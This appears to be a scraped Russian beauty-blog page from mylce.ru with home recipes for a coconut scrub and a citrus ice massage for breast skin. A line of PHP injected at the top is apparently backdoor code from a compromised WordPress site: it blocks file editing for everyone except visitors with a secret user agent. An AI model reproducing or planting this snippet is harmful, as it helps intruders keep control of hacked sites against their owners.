if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Делаем грудь красивой в домашних условиях | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепты домашней косметики для красивой груди

Для того, чтобы грудь долго сохраняла свой привлекательный внешний вид, за ней необходимо ухаживать. Читайте рецепты домашней косметики, которые продлят ее молодость!

Жен­ская грудь все­гда при­вле­ка­ет вни­ма­ние муж­чин. Но для того, что­бы она надол­го сохра­ни­ла свой при­вле­ка­тель­ный внеш­ний вид, за ней необ­хо­ди­мо уха­жи­вать. Здесь при­ве­де­ны рецеп­ты домаш­ней кос­ме­ти­ки, кото­рые про­длят ее моло­дость. Все они при­го­тов­ле­ны на осно­ве нату­раль­ных компонентов.

Пилинг с кокосом

фОТО КОКОСПилинг нано­сит­ся на зара­нее под­го­тов­лен­ную кожу гру­ди (ее необ­хо­ди­мо рас­па­рить). Состав пилин­га следующий:

  1. Коко­со­вая струж­ка — 1 ст. л.
  2. Овся­ные хло­пья – 1 ст. л.
  3. Йогурт – 1 ст. л.
  4. Мор­ская соль 1 ч. л.

В неболь­шой мисоч­ке сле­ду­ет пере­ме­шать все ингри­ди­ен­ты. Это и будет смесь для пилин­га. Ее необ­хо­ди­мо нане­сти на кожу гру­ди лег­ки­ми мас­си­ру­ю­щи­ми дви­же­ни­я­ми и смыть теп­лой водой. Очень удоб­но про­во­дить дан­ную про­це­ду­ру в бане. Для дости­же­ния резуль­та­та и, самое глав­ное, его сохра­не­ния, необ­хо­ди­мо выпол­нять эти дей­ствия 1 – 2 раза в неде­лю в тече­ние 2 – 3 месяцев.

Цитрусовый ледяной массаж

Под­дер­жи­вать грудь под­тя­ну­той помо­жет мас­саж со льдом. Толь­ко лед исполь­зу­ет­ся не про­стой, а при­го­тов­лен­ный на осно­ве сока из цит­ру­со­вых. Подой­дут для такой про­це­ду­ры соки апель­си­на, грейп­фру­та и ман­да­ри­на. Они берут­ся в рав­ных про­пор­ци­ях и сме­ши­ва­ют­ся с мине­раль­ной водой. Полу­чен­ная жид­кость замо­ра­жи­ва­ет­ся в фор­моч­ках, кото­рые име­ют­ся в каж­дой моро­зиль­ной каме­ре. Полу­чен­ны­ми ледя­ны­ми куби­ка­ми про­ти­ра­ет­ся грудь, при этом кожа ста­но­вит­ся глад­кой и упру­гой. Кос­ме­ти­ка в домаш­них усло­ви­ях пре­крас­ное сред­ство для под­дер­жа­ния красоты.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!